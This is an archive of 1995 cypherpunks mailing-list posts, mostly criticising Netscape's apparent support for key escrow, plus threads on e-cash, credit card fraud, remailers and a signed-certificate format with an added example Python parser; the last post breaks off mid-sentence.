Message-ID: <199511301533.KAA17468@homeport.org>
MIME-Version: 1.0
Content-Type: text


| > http://www.cnet.com/Central/News/govt.html
| 
|    To secure Net communications, the government will need to have access to
|  private data exchanges using what is known as a key escrow security system,
|  said Clark. He added that an invincible security system for the Net is 
|  possible, but such a system won't be built unless the government
| has a stake in it. "That's where key escrow comes in," said Clark. 

	(Assuming this means Netscape intends to build-in key escrow,
not lobby for it...)

	How does Netscape intend to address the liability issues if
the key database is stolen and their *voluntary* actions lead to my
private communications being exposed?

Adam

(Jeff, if you could pass this on to the powers that escrow, I'd
appreciate it.  I know you're here on behalf of you, but...)


-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: s1113645@tesla.cc.uottawa.ca
Date: Fri, 1 Dec 1995 00:26:02 +0800
To: cypherpunks@toad.com
Subject: [Rant!] Death by praise Re: Netscape gives in to key escrow
In-Reply-To: <Pine.3.89.9511300825.A27268-0100000@styx.ios.com>
Message-ID: <Pine.3.89.9511301034.B32713-0100000@tesla.cc.uottawa.ca>
MIME-Version: 1.0
Content-Type: text/plain




On Thu, 30 Nov 1995, Jay Holovacs wrote:

> On Thu, 30 Nov 1995, Timothy C. May wrote:
> > Can Netscape continue to prosper? This latest issue won't kill it,
> 
> I suspect this will unfortunately help. Stockholders are interested in 
> profits, not principles. Co-oping with the feds will help Netscape get to 
> the commercial market sooner, and most customers, sadly don't give a damn 
> about privacy (or don't understand).

<Rant mode on>
Clipper and family are vampires; shine some light on them and they're dead.
Witness the public ridicule of the FBI 1% scheme. Compare that to the near
mainstream silence about DT. The last round of Clipper was wonderful, for 
a while in '94 we had Time sounding like Brock Meeks.

If Jim Clark really does mean this nonsense then I hope he does a Dorothy 
Denning and takes his show on the road (sorry Jeff). This is simply 
easy fodder for journalists without a story, totally black and white 
cheap shot at the gov. While people don't give a damn about their privacy, 
they sure do get mad when they're shown how easy it is to take away. 
They *hate* hearing the $ cost.

Maybe some of the people on this list with higher profiles than myself should
start defending Clipper and GAK as loudly and stupidly as possible. I've 
grown dead tired of trying to get anyone around me interested in pgp,
remailers and whatnot. Reverse psycho sounds a lot easier:

"Noted counterterrorism expert Timothy May was quoted on Connie Chung Live 
last night as saying "Clipper, GAK and CTHULHU666 are a hundred billion 
dollar investment in your national security. Only through complete wiretapping 
will we save our nation's children from violent cigarette smokers, tax 
cheaters, unlicensed pit-bull owners, Tax 'n Spend Liberals, murderous Nation 
of Islam Dope Pushers, audiophiles, christians, fat people, OJ and 
jaywalkers on the infohighway." -USA Today" 

(Apologies. You may now killfile me with a clear conscience.)

If you can't beat 'em, subvert 'em.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Thu, 30 Nov 1995 18:17:39 +0800
To: cypherpunks@toad.com
Subject: Applied Cryptography Questions
Message-ID: <199511301008.LAA15993@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


A couple questions about Applied Cryptography (Second Edition)

1. What on earth is a Neural Net?

2. Consider the Chinese Lottery attack vs a processor bank.

   ADVANTAGES
     Distributed computing, no easy bombing target.

   DISADVANTAGES
     39% inefficient
     Need specialized hardware [for speed] or transmission of algorithms
       for any specific algorithm
     Not on all the time
     If value(crack) * cracks/chip > cost of chip, then why not have
       the gov buy the chips? It's probably cheaper that way.

3. How does one cryptanalyze a Feistel Network? Is there a general
   method?

4. Does there exist an n such that a keyspace of 2^n is trivial to crack
   [ie a matter of minutes] on a PC but is difficult to crack for a 
   big commercial company or even a major government? [this question
   relates to Merkle's puzzles, when a 40-bit key seems a bit weak.]

5. Is there an errata yet?






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter Trei" <trei@process.com>
Date: Fri, 1 Dec 1995 00:31:30 +0800
To: cypherpunks@toad.com
Subject: Re: Netscape gives in to key escrow
Message-ID: <9511301611.AA00257@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


Jeff wrote:
> sameer wrote:
> > http://www.cnet.com/Central/News/govt.html
> >         Bad. Very Bad. And I was almost starting to like Netscape.
>   Please don't give up on us yet. 
[...]
> PS - you won't find a LEF(sic)  in the soon to be released SSL Version 3 spec...
> Jeff Weinstein - Electronic Munitions Specialist

I've been trying to figure out the boundary conditions of the speech - what's the best 
and worst interpretations that can be placed upon it. I was not at the show.

Worst: Netscape will put GAK into every server and browser it sells or distributes.

Best: Out of context, misinterpreted quote, referring to the Fortezza support in the 
newest version of SSL. 

Fortezza (and the earlier, related Tessera) are PCMCIA cards with Clipper chips.
Clipper, as we know, *is* escrowed.

There's a lot of interest within the USG for using Web-based technologies for 
distributing information, some of it confidential. With a Fortezza-based laptop and
a Fortezza-enabled browser, a government employee  would be able to securely obtain 
text and graphics info while out in the field - for example, a social worker looking up
case histories while at a client's home, to choose a fairly uncontroversial example.

At a W3C meeting a few months ago, some NSA employees demoed a Tessera 
enabled Mosaic client and server. 

Netscape (and other SW companies) would like to sell to the USG - it's a big market.
Adding support for USG supported security systems expands that potential market.


Jeff, this does not let you or Netscape off of the hook. A *lot* of people are wondering 
just exactly what Jim was alluding to, and would like to see a full, in-context quote.


speaking only for myself (whatever that is worth :-)

	Peter Trei
	trei@process.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Bob Bruen, MIT Lab for Nuclear Science" <BRUEN@mitlns.mit.edu>
Date: Fri, 1 Dec 1995 00:52:01 +0800
To: cypherpunks@toad.com
Subject: cypherpunks at ietf
Message-ID: <951130112515.44600c48@mitlns.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain



  I thought the following mail might be of interest. It's not my doing.

                    Bob
=========================================================================

From:	SMTP%"MEYERUSA@aol.com" 30-NOV-1995 10:25:39.59
To:	BRUEN
CC:	
Subj:	Re: DISCUSSION FOR IETF DALLAS

Date: Thu, 30 Nov 1995 08:49:15 -0500
Sender:ietf-request@IETF.CNRI.Reston.VA.US
From: MEYERUSA@aol.com
Message-ID: <951130084914_120843907@mail06.mail.aol.com>
To: rgm3@is.chrysler.com
cc: ietf@CNRI.Reston.VA.US, SteveCase@aol.com
Subject: Re: DISCUSSION FOR IETF DALLAS

THE WWW MUST BE CONSUMER FRIENDLY IF IT IS TO SURVIVE.

THE AVERAGE CONSUMER THRU A PC, OR A "DEDICATED WEB TERMINAL ON TOP OF THEIR
TV SET", MUST BE ABLE TO USE THE WEB IN THE FUTURE TO:

          1. SEARCH FOR CONSUMER GOODS; ORDER CONSUMER GOODS.
          2. USE THE WEB FOR TELEPHONE COMMUNICATIONS AND E-MAIL
          3. DOWNLOAD TIME SHIFT AUDIO & VIDEO
          4. DOWNLOAD MOVIES, SOFTWARE, AND P.P.V. EVENTS
          5. HOOK ON-LINE TO VIDEO & AUDIO 

THE WWW AND THE ON-LINE SERVICES MUST BE ABLE TO DIAL OUT TO THE CONSUMER
ALSO.

OUR BIGGEST FUTURE PROBLEM IS THAT WE CAN NOT LET BILL GATES, NOR THE
TELEPHONE COMPANIES, NOR THE CABLE TV COMPANIES, NOR THE MADISON AVENUE
ADVERTISING AGENCIES GET CONTROL OF THE WWW.

OUR CURRENT PROBLEM IS THAT THE AVERAGE CONSUMER CAN NOT COMPLETE AN ACCURATE
SEARCH ON THE WEB.

COMPANIES MUST BE ABLE TO PROTECT THEIR TRADEMARKS AND SERVICE MARKS, AND TO
EMBED EVERY POSSIBLE KEYWORD IN THEIR SITE SO THAT IN THE FUTURE A CONSUMER
COULD ENTER AT THE SEARCH LINE:
        "SHOW ALL DEALERS IN BALTIMORE THAT SELL CHRYSLER MINI-VANS"
AND AN ACCURATE SEARCH OF THE WEB WILL BE RETURNED.

AT THIS POINT SO MANY CYBERPUNKS HAVE EMBEDDED SO MUCH GARBAGE ON THE WEB,
THAT YOU CAN NOT COMPLETE AN ACCURATE SEARCH.

OUR COMPANY HAS BEEN ASKED BY THE NEW YORK AUTO SHOW TO CREATE THE MOST
HIGHTECH VIRTUAL REALITY MOTION SIMULATOR THEATRE FOR THE 1996 NEW YORK AUTO
SHOW. DURING OUR RESEARCH, WE ENTERED "NEW YORK AUTO SHOW" IN OUR WEB CRAWLER
(AMERICA ON-LINE). YOU COULD NOT BELIEVE ALL OF THE GARBAGE THAT WAS RETURNED
FROM OUR SEARCH.

ADDITIONALLY FOR EXAMPLE, IF ON AMERICA ON-LINE YOU NEED TO SEND AN E-MAIL TO
DONALD TRUMP OR TO AOL'S STEVE CASE, WHEN YOU SEARCH THE AOL MEMBER DATABASE,
WHO IS THE REAL DONALD TRUMP OR THE REAL STEVE CASE.

IN SUMMARY, WHAT NEEDS TO BE DISCUSSED AT  IETF IN DALLAS NEXT WEEK IS A
STANDARD THAT PROTECTS TRADEMARKS AND SERVICE MARKS, AND ALSO A POLICING
AGENCY THAT WILL DETERMINE THAT DONALD TRUMP IS AT DONALD TRUMP@, CHRYSLER IS
AT CHRYSLERY@ BILL GATES IS AT BILL GATES@, ETC.

BUT MORE IMPORTANT, WE NEED TO CLEANUP THE TRASH THAT THE CYBER-PUNKS ARE
PLACING ON THE WEB.


ED MEYER 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ravi Pandya <rpandya@netcom.com>
Date: Fri, 1 Dec 1995 04:01:16 +0800
To: cypherpunks@toad.com
Subject: Re: Netscape gives in to key escrow
Message-ID: <199511301927.LAA12863@netmanage.com>
MIME-Version: 1.0
Content-Type: text/plain


If you're looking for an alternative Web browser for Windows, we just made
ours available for free at www.netmanage.com. It's fast and reliable, and
supports HTML 3.0, inline video, software distribution, VRML (NT version),
Real Audio, TrueSpeech, etc.

Ravi

**** Home of Chameleon TCP/IP Applications for Windows and ****
**** ECCO Personal & Group Information Manager for Windows ****

Ravi Pandya
Director of ECCO Engineering
NetManage Inc
2340 130th Avenue NE
Bellevue, WA 98005
206 867 3722 voice
206 885 0127 fax
ravip@netmanage.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 1 Dec 1995 14:12:32 +0800
To: cypherpunks@toad.com
Subject: Netscape, Corporations, and GAK Support
Message-ID: <ace330c90e0210045e96@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain



The firestorm of criticisms of Netscape and Jim Clark over his apparent
support for mandated key escrow (GAK, "Government Access to Keys," Carl
Ellison) raises some issues:

1. To what extent are the government and its supporters of GAK applying
pressure to corporations and/or giving them private briefings on security
issues?

(Recall the infamous "If you knew what I knew, you'd support Clipper" sorts
of comments from people who'd apparently been given glimpses of the Four Horsemen
riding in.)

2. What is the appropriate response for folks like us when it becomes
apparent that a corporation with a tremendous influence on future
directions in security and privacy (examples being both Microsoft and
Netscape) has apparently been jaw-boned in private on security issues?

(I tend to use "apparently" and "ostensibly" a lot, as you've probably
noticed. It's my way of signalling some uncertainty. The history of GAK has
indicated to me that discussions are happening in private with CEOs and
suchlike, else why or how could some of the public comments come out the
way they do? But I don't know this for a fact--a side effect of private
channels, ironically--so I can only call 'em as I "apparently" see 'em.)

Supporters of corporations, motivated by a range of reasons, often ask
critics to "hold off" on criticisms until firmer statements of policy are
made, or until actual products are introduced.

Alas, this is a bad strategy for us to follow. The very nature of the
behind-the-scenes maneuvering, and the long lead times for products, means
that we must be alert for "early warning signals" of impending GAK and
other totalitarian measures.

I personally believe that the government supporters of mandated key escrow
and other restrictions on the use of encryption have looked at the
explosive growth of the Web in general and of Netscape in particular and
are *frantically* looking for ways to get a handle on the issues that
motivate them. As others have speculated, putting GAK into every Netscape
_server_ would have certain advantages, and I would be very surprised
indeed if NSA/NIST/Denning have not been thinking about this issue.

(Ray Cromwell says it can be skirted...I don't doubt this, just as
superencryption can skirt GAK in machine-to-machine e-mail. But this
doesn't mean that we should just ignore signs that GAK may be built into
Netscape, or other products.)

It's possible that Jim Clark--whose quotations I have not yet seen denied
by Netscape--is merely naive on matters of mandated key escrow. It's
possible that he hasn't given it much thought. It's also possible that he
sincerely is supportive of plans for Big Brother to have an "escrowed" copy
of our conversations, diaries, travel plans, etc.

I don't know, and I hope we soon hear more from Jim Clark on this issue.
But I will always think it appropriate to listen carefully for evidence
that a company plans to help build the Surveillance State, and to act in
response to such evidence.

The stakes are just too high to "wait for an actual product" before
speaking out.

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carl Ellison <cme@TIS.COM>
Date: Fri, 1 Dec 1995 01:01:49 +0800
To: jamesd@echeque.com
Subject: Attribute-testimony example (was Re: The future will be easy to use)
In-Reply-To: <199511301622.IAA08718@blob.best.net>
Message-ID: <9511301638.AA05094@tis.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

>Date: Wed, 29 Nov 1995 08:20:46 -0800
>From: "James A. Donald" <jamesd@echeque.com>
>
>From: Rich Salz <rsalz@osf.org>
>> > There is, of course, no way to interpret the semantics of this
>> > electronically.
>
>At 10:11 AM 11/30/95 EST, Carl Ellison wrote:
>> Of course not.  In the end, a human needs to make the decision based on
>> ASCII text.
>
>For those ascii texts that belong to a small and commonly used set,
>we can set our computers to automatically follow certain policies,
>and to bring to our attention "special case" texts that lie outside
>this set.

Exactly!

We haven't yet learned that small and commonly used set -- understandably,
since the field is so new.  I'd be willing to bet that association between
a key and a checking account would be on the list.  Beyond that, I don't
know.

Once an element of that set is identified, it can be assigned a codeword
(to make parsing easier).

For example, a general certificate might be:

- -----BEGIN PGP SIGNED MESSAGE-----

Signing-Key-ID: f149b8e7e1f71e60964fff361dae2460
Signed-Key-ID: 76c68cb46a8e3de1509acaf4170feb10
Meaning: I have met this person, introduced to me as James, who signed
	with that key and I found him to be about 25 years old, roughly
	5'11" and with dark hair.  Beyond that I don't remember much.

- -----BEGIN PGP SIGNATURE-----
[...]   signature with the signing key
- -----END PGP SIGNATURE-----



While the specialized one might be:

- -----BEGIN PGP SIGNED MESSAGE-----

Signing-Key-ID: bc2cb00144f223498fcc074eabb821d0
Signed-Key-ID: e05c601c4ec4af3aeb54a53171ed65da
Meaning: checking-account: 116 94265, First Security Bank

- -----BEGIN PGP SIGNATURE-----
[...]   signature with First Security Bank's key
- -----END PGP SIGNATURE-----



This format has several advantages over ASN.1, of course, but I won't
belabor that point here.

 - Carl

+--------------------------------------------------------------------------+
|Carl M. Ellison      cme@tis.com    http://www.clark.net/pub/cme	   |
|Trusted Information Systems, Inc.   http://www.tis.com/                   |
|3060 Washington Road          PGP 2.6.2:  61E2DE7FCB9D7984E9C8048BA63221A2|
|Glenwood MD  21738         Tel:(301)854-6889      FAX:(301)854-5363       |
+--------------------------------------------------------------------------+

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

-----END PGP SIGNATURE-----
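
[Added example, not part of Carl Ellison's message or any poster's code.] The split discussed in the message above (act automatically on a small set of known codewords, bring everything else to a human) as a parser for the "Signing-Key-ID / Signed-Key-ID / Meaning" format. The policy table and its account pattern are assumptions, and signature checking is outside this sketch: the signature must be verified against the signing key before any Meaning is acted on.

```python
import re
from dataclasses import dataclass

BEGIN_MSG = "-----BEGIN PGP SIGNED MESSAGE-----"
BEGIN_SIG = "-----BEGIN PGP SIGNATURE-----"
FIELDS = ("Signing-Key-ID", "Signed-Key-ID", "Meaning")
KEY_ID = re.compile(r"[0-9a-f]{32}")
CODEWORD = re.compile(r"([a-z][a-z0-9-]*): (.+)")

# Assumed policy table: codeword -> pattern its value must match before the
# machine may act on it. Only the "checking-account" codeword is in the post.
POLICIES = {
    "checking-account": re.compile(r"(?P<account>\d[\d ]*\d), (?P<bank>\S.*)"),
}

# The post's two certificates with the outer "- " dash-escaping removed;
# signature bodies stay elided, as in the post.
GENERAL = """\
-----BEGIN PGP SIGNED MESSAGE-----

Signing-Key-ID: f149b8e7e1f71e60964fff361dae2460
Signed-Key-ID: 76c68cb46a8e3de1509acaf4170feb10
Meaning: I have met this person, introduced to me as James, who signed
    with that key and I found him to be about 25 years old, roughly
    5'11" and with dark hair.  Beyond that I don't remember much.

-----BEGIN PGP SIGNATURE-----
[...]
-----END PGP SIGNATURE-----
"""

SPECIALIZED = """\
-----BEGIN PGP SIGNED MESSAGE-----

Signing-Key-ID: bc2cb00144f223498fcc074eabb821d0
Signed-Key-ID: e05c601c4ec4af3aeb54a53171ed65da
Meaning: checking-account: 116 94265, First Security Bank

-----BEGIN PGP SIGNATURE-----
[...]
-----END PGP SIGNATURE-----
"""


@dataclass(frozen=True)
class Certificate:
    signing_key_id: str
    signed_key_id: str
    meaning: str


def parse(text):
    """Parse the signed body strictly; any ambiguity is an error, not a guess."""
    lines = text.strip().splitlines()
    if not lines or lines[0] != BEGIN_MSG or BEGIN_SIG not in lines:
        raise ValueError("not a clearsigned certificate")
    fields, name = {}, None
    for line in lines[1:lines.index(BEGIN_SIG)]:
        if not line.strip():
            name = None                      # a blank line ends any continuation
        elif line[0] in " \t":               # indented line continues the field
            if name is None:
                raise ValueError("continuation line without a field")
            fields[name] += " " + line.strip()
        else:
            name, sep, value = line.partition(":")
            if not sep or name not in FIELDS:
                raise ValueError(f"unexpected line: {line!r}")
            if name in fields:               # two Signed-Key-IDs would be ambiguous
                raise ValueError(f"duplicate field: {name}")
            fields[name] = value.strip()
    missing = [f for f in FIELDS if f not in fields]
    if missing:
        raise ValueError(f"missing fields: {missing}")
    for f in FIELDS[:2]:
        if not KEY_ID.fullmatch(fields[f]):
            raise ValueError(f"malformed {f}")
    return Certificate(fields["Signing-Key-ID"], fields["Signed-Key-ID"],
                       fields["Meaning"])


def classify(cert):
    """Return ("auto", codeword, values) or ("human", None, free_text)."""
    m = CODEWORD.fullmatch(cert.meaning)
    if m and m.group(1) in POLICIES:
        values = POLICIES[m.group(1)].fullmatch(m.group(2))
        if values:
            return ("auto", m.group(1), values.groupdict())
    # Unknown codeword, malformed value or plain prose: a person decides.
    return ("human", None, cert.meaning)


if __name__ == "__main__":
    for sample in (GENERAL, SPECIALIZED):
        print(classify(parse(sample)))
```

A known codeword whose value does not match its pattern falls back to human review instead of being acted on in part.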




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Patiwat Panurach <pati@ipied.tu.ac.th>
Date: Fri, 1 Dec 1995 00:30:56 +0800
To: cypherpunks@toad.com
Subject: VisaCash security.
In-Reply-To: <9511300318.AA02710@zorch.w3.org>
Message-ID: <Pine.SUN.3.91.951130113539.3024C-100000@ipied.tu.ac.th>
MIME-Version: 1.0
Content-Type: text/plain


	I have read that Visa intends to begin a digital cash system, 
using both discardable and rechargeable cards that would implement secure 
cash transactions.  The system is now in use in Australia, and there are 
plans for use during the Olympic Games at Atlanta and a pilot project in 
Thailand.
	Does anybody know if this is truly "cash"?  Is it traceable, and 
what encryption does it use?

------------------------------------------------------------------------------
Patiwat Panurach      	     Whatever you can do, or dream you can, begin it.
eMAIL: pati@ipied.tu.ac.th      Boldness has genius, power and magic in it.
m/18 junior Fac of Economics		-Johann W.Von Goethe







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: s1113645@tesla.cc.uottawa.ca
Date: Fri, 1 Dec 1995 01:02:52 +0800
To: cypherpunks@toad.com
Subject: Re: e-cash gambling
In-Reply-To: <199511301536.QAA25670@utopia.hacktic.nl>
Message-ID: <Pine.3.89.9511301102.A24799-0100000@tesla.cc.uottawa.ca>
MIME-Version: 1.0
Content-Type: text/plain




On Thu, 30 Nov 1995, Anonymous wrote:

> I would like to see e-cash gambling on US Presidential elections/primaries
> [as is currently done in London & Moscow]. There was an interesting W$J
> article that pointed out how the odds in these gambling houses track the
> results of elections more accurately (from thousands of miles away) than
> Gallup & Roper ever have, (and without calling me at suppertime)<g>. The

Idea Futures. (This has already been mentioned in this thread)
There is an outfit calling itself Ideosphere that is planning a 
commercial version of an Idea Futures. It is certainly fairer than online 
roulette. You might want to try the game out yourself. Dr. Froomkin has a 
link to it on his homepage (I think). 

> It would accomplish the cypherpunk goals of setting important information
> free through use of our technology, it would encourage gamblers to learn
> about strong crypto, and it would use crypto for something besides child
> porn or drugs, which will be good PR for us. There will, of course, be

Incidentally there are a lot of crypto related claims being played (which
is natural considering the number of cpunks in the game).




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Fri, 1 Dec 1995 04:28:04 +0800
To: edge@got.net (Jay Campbell)
Subject: Re: "Got a subpoena?"
In-Reply-To: <199511302056.MAA07241@you.got.net>
Message-ID: <199511301946.LAA12448@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> 
> What about a court order to (a) start comprehensive logging, and (b) not
> tell anyone under penalty of ______ .

	Aren't court orders part of the public record? I don't quite
know how this would work. I don't think they can keep me from telling
people that I've started comprehensive logging, or at least keep it
from being found out. (Legally, that is. I'm sure they could always
use an approach like threatening to audit me every year, threatening
my family, etc.)

-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org/ (or login as "guest")		sameer@c2.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Frank Stuart <fstuart@vetmed.auburn.edu>
Date: Fri, 1 Dec 1995 02:55:30 +0800
To: cypherpunks@toad.com
Subject: [NOISE] Re: cypherpunks at ietf
Message-ID: <199511301759.LAA18735@snoopy.vetmed.auburn.edu>
MIME-Version: 1.0
Content-Type: text/plain


[...]
>THE WWW MUST BE CONSUMER FRIENDLY IF IT IS TO SURVIVE.
>
>THE AVERAGE CONSUMER THRU A PC, OR A "DEDICATED WEB TERMINAL ON TOP OF THEIR
>TV SET", MUST BE ABLE TO USE THE WEB IN THE FUTURE TO:
>
>          1. SEARCH FOR CONSUMER GOODS; ORDER CONSUMER GOODS.
>          2. USE THE WEB FOR TELEPHONE COMMUNICATIONS AND E-MAIL
>          3. DOWNLOAD TIME SHIFT AUDIO & VIDEO
>          4. DOWNLOAD MOVIES, SOFTWARE, AND P.P.V. EVENTS
>          5. HOOK ON-LINE TO VIDEO & AUDIO 
6. View text in lower case.  :>
[...]

                          | (Douglas) Hofstadter's Law:
Frank Stuart              | It always takes longer than you expect, even 
fstuart@vetmed.auburn.edu | when you take into account Hofstadter's Law.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Pete Loshin <pete@loshin.com>
Date: Fri, 1 Dec 1995 01:46:35 +0800
To: "'cypherpunks@toad.com>
Subject: RE: "Proprietary" internetworking protocols (was RE: The future will be easy to use )
Message-ID: <01BABF1F.0246DD80@ploshin.tiac.net>
MIME-Version: 1.0
Content-Type: text/plain


Perry wrote:
>Pete Loshin writes:
>> I was simply observing that Perry's comment:
>> 
>> "...an internetworking protocol [e.g. SKIP] used by only 
>> one vendor gets nowhere."
>> 
>> is not necessarily true, and pointed to SSL and NFS as 
>> counter-examples.
>
>I disagree.
>
>First of all, NFS was not competing with other widely available
>standards.

Neither was SSL, for that matter.  But it seems like every vendor
who's written an S-HTTP browser/server is adding SSL for version 1.1.

>Second of all, other vendors are committed to developing the other
>standard.
>
>What good will it be to run SKIP when your Cisco router wants to talk
>to you with something else?

None, of course, just as rsh doesn't help me connect to a telnet 
server. My comment wasn't on the wisdom of SKIP, but rather on 
the specific statement Perry made about single vendors being able 
to drive certain protocols on their own (e.g., SSL and others).

More interesting from the historical view (but lacking in crypto 
significance so I'll refrain from further posting on the topic) 
is the question of what other protocols have been put forth by 
single vendors and gained major market share.

-pl





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jon Lasser <jlasser@rwd.goucher.edu>
Date: Fri, 1 Dec 1995 02:23:17 +0800
To: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Subject: Re: The future will be easy to use
In-Reply-To: <01HY8GNOCLCS8WYXCN@mbcl.rutgers.edu>
Message-ID: <Pine.SUN.3.91.951130123239.3869A-100000@rwd.goucher.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 30 Nov 1995, E. ALLEN SMITH wrote:

> However, if you have optional linking of ID and name, shippers will only 
> ship to keys with such attributes. Because just ID and address, it could 
> be a "hit and run" type attack shipped to a safe maildrop.
> ---------------------------------
> 	If the transaction is via a Credit Card, it's the card issuer's
> liability (and responsibility to determine creditworthiness), unless I'm badly
> mistaken. If it's bank-issued ecash, then it's up to the bank to disgorge
> physical dollars when ecash is presented to them. What's the risk in either
> case?

Credit card fraud -- ie I've snarfed someone's card number and they 
haven't figured it out yet.

Cardholder's liability is $50 (I think).  Depending on the situation (if 
it's a card-is-physically-present transaction or a not-present) the 
liability falls to either the bank or the merchant.

A "proof of address" is a darn good way to reduce (not prevent, reduce) 
that sort of fraud.

Jon
------------------------------------------------------------------------------
Jon Lasser                <jlasser@rwd.goucher.edu>            (410)494-3072 
          Visit my home page at http://www.goucher.edu/~jlasser/
  You have a friend at the NSA: Big Brother is watching. Finger for PGP key.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jon Lasser <jlasser@rwd.goucher.edu>
Date: Fri, 1 Dec 1995 02:38:46 +0800
To: "James A. Donald" <jamesd@echeque.com>
Subject: Re: The future will be easy to use
In-Reply-To: <199511300704.XAA01742@blob.best.net>
Message-ID: <Pine.SUN.3.91.951130123535.3869B-100000@rwd.goucher.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 28 Nov 1995, James A. Donald wrote:

> >Not if you're encrypting a Credit Card transaction to ship physical 
> >goods.  In that case, I'm going to certainly want to link a key ID to a 
> >physical body (or at least address) if I'm the seller, so as to limit 
> >liability as best I can.
> 
> Not at all:  All you need to do is be able to prove you shipped 
> to the address requested:  You do not have to know what the 
> relationship is between the address requested and identity 
> paying you to ship.

That's if you're accusing the merchant of fraud. I'm positing someone's 
using a stolen credit card number.  (Yes, these will still exist for at 
least a while after e-cash becomes commonplace).  If I'm a merchant, I'm 
going to really want (if I know it's possible) to ship only to what's 
been "the address on the card" (or, in reality, in the database under the 
card's number) so that it's harder (not impossible, harder) for people to 
defraud me.

> > However, if you have optional linking of ID and name, shippers will only 
> > ship to keys with such attributes. Because just ID and address, it could 
> > be a "hit and run" type attack shipped to a safe maildrop.
> 
> This argument makes no sense at all:  I am going to attack my
> enemies by paying people to send books, computers, and stuff
> to them?

No; you're going to steal from your enemies by having them ship things to 
you without payment.

Note that in an ecash economy, this isn't a problem.  The original post 
was about the transition between the current economy and a "cypherpunks" 
economy, during which I suggested that encryption would be used to 
protect credit card numbers (and be a "proof of identity" -- which I was 
claiming wouldn't work without ecash (proof of non-fraud payment))

Jon
------------------------------------------------------------------------------
Jon Lasser                <jlasser@rwd.goucher.edu>            (410)494-3072 
          Visit my home page at http://www.goucher.edu/~jlasser/
  You have a friend at the NSA: Big Brother is watching. Finger for PGP key.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@c2.org>
Date: Fri, 1 Dec 1995 05:50:28 +0800
To: cypherpunks@toad.com
Subject: Getting a copy of the Jim Clark speech
Message-ID: <199511302041.MAA19507@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


I called Netscape public relations. Here's what I found out:

1. Netscape PR does not keep transcripts, etc., of Jim Clark's
speeches.

2. You can order a tape of the speech from Conference Copy for
$12. Their phone number is +1 (717) 775 0580. Be advised, though, that
it will take three weeks.

If we are lucky, an amateur recording technician (trained by the
Grateful Dead, perhaps?) will come out of the woodwork before
then. Failing that, maybe a Fair Witness was there and is willing to
speak.

Raph





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Fri, 1 Dec 1995 02:49:07 +0800
To: Jeff Weinstein <jsw@netscape.com>
Subject: Re: Netscape gives in to key escrow
In-Reply-To: <30BD716E.5F69@netscape.com>
Message-ID: <199511301752.MAA06161@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Jeff Weinstein writes:
> sameer wrote:
> > 
> > http://www.cnet.com/Central/News/govt.html
> > 
> >         Bad. Very Bad. And I was almost starting to like Netscape.
> 
>   Please don't give up on us yet.  All press accounts I've read so far
> have lots of stuff attributed to Jim, but very little of it is actual
> quotes.

Jeff, I'll be blunt.

I'm never going to use Netscape again if it turns out to be true. Sure
Mosaic bites, but who cares -- with enough work we can make it or
something else compete with your product if need be, and I bet that
you guys can't keep up with five hundred angry hackers.

I'll also happily run a campaign to convince everyone else on the
internet that you guys are helping to violate their privacy, because
you would be. Tell Jim Clark that if he goes through with it he has
something far worse to lose than his friends in the government -- the
billion he just got his hands on. Tell him that if he is being
misquoted he'd better make sure that retractions get printed and fast.

If you don't want "Netscape Inside" to be treated as a warning label,
you guys will reject escrow as any other ethical company would -- or
else.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Fri, 1 Dec 1995 06:03:22 +0800
To: cypherpunks@toad.com
Subject: Re: List of reliable remailers
In-Reply-To: <199511301739.JAA13160@jobe.shell.portal.com>
Message-ID: <199511302053.MAA27611@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


Apologies for following up on my own post, but I did some digging and
found out what I needed to know.

> > Groups of remailers sharing a machine or operator:
> > (robo syrinx c2)
> > (flame hacktic replay)
> > (alumni portal)
> 
> Anything more specific on the above info? 

It turns out that this information is only intended for automatic
